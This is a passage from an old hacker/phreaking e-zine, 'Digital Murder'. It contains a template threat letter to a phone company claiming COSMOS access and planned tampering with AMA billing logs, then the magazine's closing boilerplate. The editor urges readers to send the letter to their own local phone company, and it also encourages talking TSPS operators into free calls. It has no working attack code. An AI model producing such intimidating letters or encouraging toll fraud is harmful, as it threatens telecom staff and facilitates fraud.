     at Bell Labs ar not too interesting at this time.  However, should
     you ever implement new and extensive protection, I may give it a
     try, which ultimately would aid you in impleminting higher levels of
     security.  This may make you feel like you actually have a meaningful
     existance in todays job market but it is people like me and the rest
     of the hackers that give security ANALysts their jobs.

          In closing, all I have to say is that as of now, I am bored
     with your development.  But now, with my aquisition of a COSMOS
     account, I will attempt to access your AMA logs, to help a few
     friends of mine, with their long diastance calling record. I am
     sure that by you trying to figure out how I am doing this, you
     will provide me with a small challenge.  Have you ever heard of LOD?
     Well just imagine that group, 5 times better, and about 4 people with
     a severe hatred for Bell and everything concerning it.  I am trying
     to alert you to this, because I am REALLY bored.  That is all there
     is to it.  COSMOS has many possibilites.  I have dialups, passwords,
     wire centers, complete information on the system.  I've been doing
     some checking on it and within the week, you shall see the fruits
     of my long and hard labor intensive work.  Oh well, nice to talk
     to you.  Hopefully this letter will reach someone who will realize


     the true potential of it.  Because talking to a TSPS operator is
     like talking to a 976 phone sex operator.  They give out all types
     of information and if you talk right to them you don't have to pay.
          If you want to contact me then look on any of the more popular
     networks.  For example, Internet, Bitnet, QSD, or any of the higher
     level Bell Labs mainframes.  Superuser status is so easy to obtain
     on your systems.

                                       (Your alias here)
          There, as you can see, is one my extremely phucked
      up ideas of a letter to end to my local CO.  Make copies of
      this and send them to YOUR local phone Co.  I'm sure they will
      appreciate hearing from their customers on a more technical
      level.  Until next time, see you in the Funny Farm...

               Heaven's Trash             -Final Words from Morpheus

           Thanks for reading Digital Murder.  We welcome anyone that
      writes decent articles and believes in the free exchange of
      information to our staff.  If you would like to write for DM then
      send us a letter or call one of our support boards.  Right now
      our only support board is Backdoor @ 901.386.6455 but the list
      will grow very soon as I work out the details with other US SysOps.

           Here is the file-naming format we use to denote issue
      number and version of DM when spreading it to others on boards:

                       ()-----Version Number: 40 - 40 col. version
                 DM#00180                     80 - 80 col. version
      Mag.name---()   ^                       64 - C=64 prg. version
                      !-------Issue Number

      Needless to say, the 40 and 80 col. versions are in ASCII while
      the 64 version is an ml coded version (in the works).  I thought
      it would be a good idea to make different versions since phreaking
      and hacking is the same for all comp. types.  The only version we
      have ignored is the 22 column version for Commodore Vic 20 users.
      If you are hacking and phreaking with one of those old relics and
      aren't clinicly insane yet then consider upgrading your system so
      you won't have to bug your friend to let you read DM every month
      on his system.

           If you plan on printing the mag out, you have probably already
      noticed that the pages are numbered, spaced out, etc.  enjoy.

           You can find Digital Murder on most of the better boards in
      the United Socialist Republic of Amerika.  Write us or leave email
      if you have ANY questions, comments, additional info on an article,
      new articles, etc. . .  We will reply to all input we recieve
      either through mail (regular postal service or Email) or in the
      letters section of future issues of Digital Murder.

           Next issue will be out (hopefully Nov. 15th) just in time
      for Thanksgiving.  Then you can thank me for giving up all my
      extra time I have, when I'm not busy with college or my girlfriend,
      to edit and publish yet another stodgy electronic magazine full of
      free information.  Till next month or until Dan Quayle's IQ is
      higher than an AT&T manhole cover, so long.